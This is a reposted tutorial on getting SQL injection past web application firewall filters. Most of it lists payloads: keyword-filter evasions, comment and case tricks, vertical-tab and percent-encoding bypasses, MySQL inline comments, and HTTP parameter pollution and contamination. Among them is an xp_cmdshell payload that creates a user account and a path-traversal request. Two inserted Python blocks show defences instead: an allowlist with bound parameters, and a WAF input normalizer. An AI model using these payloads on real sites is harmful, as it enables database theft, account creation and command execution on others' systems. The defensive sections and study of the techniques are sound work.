Knowledge about SQL Injection bypass and SQL Injection Bypass

Source: Internet
Author: User

I. Concept of bypassing a WAF

Start from step 1: look at what each filter blocks, then find an equivalent expression that it lets through.

1. Filter and, or

preg_match('/(and|or)/i', $id)

Filtered injection: 1 or 1 = 1
Filtered injection: 1 and 1 = 1
Bypassed injection: 1 || 1 = 1
Bypassed injection: 1 && 1 = 1

2. Filter and, or, union

preg_match('/(and|or|union)/i', $id)

Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

3. Filter and, or, union, where

preg_match('/(and|or|union|where)/i', $id)

Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'

4. Filter and, or, union, where, limit

preg_match('/(and|or|union|where|limit)/i', $id)

Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

5. Filter and, or, union, where, limit, group by

preg_match('/(and|or|union|where|limit|group by)/i', $id)

Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1

6. Filter and, or, union, where, limit, group by, select

preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'

7. Filter and, or, union, where, limit, group by, select ,'

preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)

Filtered injection: 1 || substr(user,1,1) = 'a'
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)

8. Filter and, or, union, where, limit, group by, select, ', hex

preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)

Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))

9. Filter and, or, union, where, limit, group by, select, ', hex, substr

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)

Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)

10. Filter and, or, union, where, limit, group by, select, ', hex, substr, whitespace

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)

Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)
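An added example (not from the article) that puts the step-9 blacklist next to the defence the whole chain above is missing: an allowlist on the id parameter and a bound query parameter. The users table, the Python translation of the preg_match pattern and the lookup function are constructed for this demo; note that Python's \s already matches the %0b vertical tab, so step 10's whitespace class is not reproduced here (older PCRE did not include \x0b in \s, which is what the step-10 bypass relies on).

```python
import re
import sqlite3

# Step-9 blacklist from the article, translated from the PHP preg_match
# pattern into a Python regex (same alternation, same case-insensitive flag).
BLACKLIST = re.compile(r"(and|or|union|where|limit|group by|select|'|hex|substr)", re.I)

# Allowlist: an id is only ever a short decimal integer. This, not a longer
# blacklist, is the check that closes the whole bypass chain.
ALLOWLIST = re.compile(r"\A[0-9]{1,10}\Z")


def blacklist_blocks(value: str) -> bool:
    """True if the article's step-9 filter would reject this parameter value."""
    return BLACKLIST.search(value) is not None


def allowlist_accepts(value: str) -> bool:
    """True only for a plain decimal id."""
    return ALLOWLIST.match(value) is not None


def make_db() -> sqlite3.Connection:
    """Constructed sample table for the demo (hypothetical data, in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "admin"), (2, "alice"), (3, "bob")])
    return conn


def lookup_user(conn: sqlite3.Connection, raw_id: str):
    """Hardened lookup: allowlist first, then a bound parameter, never concatenation."""
    if not allowlist_accepts(raw_id):
        return None
    row = conn.execute("SELECT user FROM users WHERE user_id = ?",
                       (int(raw_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ["1", "1 || lpad(user,7,1)", "1 || substr(user,1,1) = 0x61"]:
        print(repr(payload),
              "blacklist blocks:", blacklist_blocks(payload),
              "allowlist accepts:", allowlist_accepts(payload),
              "lookup:", lookup_user(db, payload))
```

The step-9 payload from the article passes the blacklist but never reaches the database, because the allowlist rejects anything that is not a bare integer.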

II. Regular Expression Bypass

These bypasses rely on the regular expression matching only one specific token, so the same condition written another way is not caught. For example, when '=' is filtered:

Filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1
Bypassed injection: 1 or '1'
Bypassed injection: 1 or char(97)

Another example:

Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

III. General Bypass

1. Comments

?id=1+un/**/ion+se/**/lect+1,2,3--

2. Case sensitivity

?id=1+UnIoN/**/SeLecT/**/1,2,3--

3. Keyword replacement

Some WAFs use preg_replace to strip SQL keywords from the input. Because the replacement runs only once, a keyword nested inside itself survives the pass, and a %0b inside the keyword keeps the pattern from matching at all:

?id=1+UNunionION+SEselectLECT+1,2,3--
?id=1+uni%0bon+se%0blect+1,2,3--

Sometimes the comment sequence '/**/' is filtered as well; %0b (vertical tab) can then take its place as the separator:

Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed:  http://localhost/id/1%0b||%0blpad(first_name,7,1).html

4. Encoding

A typical script: NukeSentinel.php

// Check for UNION attack
// Copyright 2004(c) Raven PHP scripts
$blocker_row = $blocker_array[1];
if ($blocker_row['activate'] > 0) {
    if (stristr($nsnst_const['query_string'], '+union+') OR
        stristr($nsnst_const['query_string'], '%20union%20') OR
        stristr($nsnst_const['query_string'], '*/union/*') OR
        stristr($nsnst_const['query_string'], ' union ') OR
        stristr($nsnst_const['query_string_base64'], '+union+') OR
        stristr($nsnst_const['query_string_base64'], '%20union%20') OR
        stristr($nsnst_const['query_string_base64'], '*/union/*') OR
        stristr($nsnst_const['query_string_base64'], ' union ')) {
        // block_ip($blocker_row);
        die("BLOCK IP 1 ");
    }
}

The check looks only for those literal byte sequences in the raw query string, so percent-encoding the comment delimiters or the slashes is enough to miss every branch:

Forbidden: http://localhost/php/?/**/union/**/select
Bypassed:  http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed:  http://localhost/php/?%2f**%2funion%2f**%2fselect

5. Buffer Overflow

http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10--

6. Inline comments (MySQL)

http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

IV. Advanced Bypass

1. HPP (HTTP parameter pollution)

The same parameter is sent more than once, and each web server resolves the duplicates differently:

index.php?par1=val1&par1=val2

| Web server  | par1      |
| :--         | :--       |
| ASP.NET/IIS | val1,val2 |
| ASP/IIS     | val1,val2 |
| PHP/Apache  | val2      |
| JSP/Tomcat  | val1      |

Example, in an ASP/ASP.NET environment:

Forbidden: http://localhost/search.aspx?q=select name,password from users
Bypassed:  http://localhost/search.aspx?q=select name&q=password from users
Bypassed:  http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
Bypassed:  http://localhost/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user test test /*&id=1*/ --
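An added normalization helper, not part of the original article, covering sections III and IV.1 from the WAF side: it percent-decodes until the text stops changing, resolves both comment styles (a MySQL /*! ... */ body is kept because the server executes it), folds the %0b vertical tab into an ordinary space, and reassembles repeated parameters the way each server in the HPP table does, so a rule is evaluated on what the backend will actually see. The join rules, the detection pattern and the sample query strings are assumptions for this demo.

```python
import re
from urllib.parse import parse_qsl, unquote

# How each server in the article's HPP table exposes a repeated parameter
# (ASP and ASP.NET join with a comma, PHP keeps the last value, JSP the first).
JOIN_RULES = {
    "ASP.NET/IIS": lambda vals: ",".join(vals),
    "ASP/IIS": lambda vals: ",".join(vals),
    "PHP/Apache": lambda vals: vals[-1],
    "JSP/Tomcat": lambda vals: vals[0],
}

INLINE_RE = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # MySQL executes the body of /*! ... */
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)       # a plain /* ... */ is only a separator
SPACE_RE = re.compile(r"[\s\x0b]+")               # \x0b is the %0b vertical tab used above
# Assumed detection rule for the demo: UNION SELECT, or SELECT ... FROM, in one parameter.
DETECT_RE = re.compile(r"\bunion\s+select\b|\bselect\b.*\bfrom\b")


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the text stops changing, so %2A%2A or %252A end up literal."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize(value: str) -> str:
    """Canonical form to inspect: decoded, comments resolved, whitespace collapsed, lowercase."""
    text = decode_fully(value)
    text = INLINE_RE.sub(r" \1 ", text)
    text = COMMENT_RE.sub(" ", text)
    text = SPACE_RE.sub(" ", text)
    return text.strip().lower()


def server_view(query: str, server: str) -> dict:
    """Reassemble the query string the way the named server's application will see it."""
    grouped: dict = {}
    for key, val in parse_qsl(query, keep_blank_values=True):
        grouped.setdefault(key, []).append(val)
    return {k: JOIN_RULES[server](v) for k, v in grouped.items()}


def flags_select(query: str, server: str) -> bool:
    """Evaluate the rule on the normalized, server-specific view instead of the raw string."""
    view = server_view(query, server)
    return any(DETECT_RE.search(normalize(k + " " + v)) for k, v in view.items())
```

The split-parameter payload from the ASP example is flagged only when the inspection uses the ASP join rule; the same bytes judged with PHP's last-value rule look harmless, which is why a WAF in front of several stacks has to know which one it is protecting.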

2. HPC (HTTP parameter contamination)

RFC 2396 defines the following character classes:

Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ( )
Reserved:   ; / ? : @ & = + $ ,
Unwise:     { } | \ ^ [ ] `

Different web servers apply different logic when such characters appear in a parameter name or value:

| Query String | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP   |
| :--          | :--                      | :--        |
| ?test[1=2    | test_1=2                 | test[1=2   |
| ?test=%      | test=%                   | test=      |
| ?test%00=1   | test=                    | test=1     |
| ?test=1%001  | NULL                     | test=1     |
| ?test+d=1+2  | test_d=1 2               | test d=1 2 |

Example:

Forbidden: http://localhost/?xp_cmdshell
Bypassed:  http://localhost/?xp[cmdshell
Forbidden: http://localhost/test.asp?file=../flag.txt
Bypassed:  http://localhost/test.asp?file=.%./flag.txt
Forbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed:  http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

Summary

The above is a summary of SQL injection bypass techniques. I hope the content of this article helps you in your study or work. If you have any questions, you can leave a message; thank you for your support.
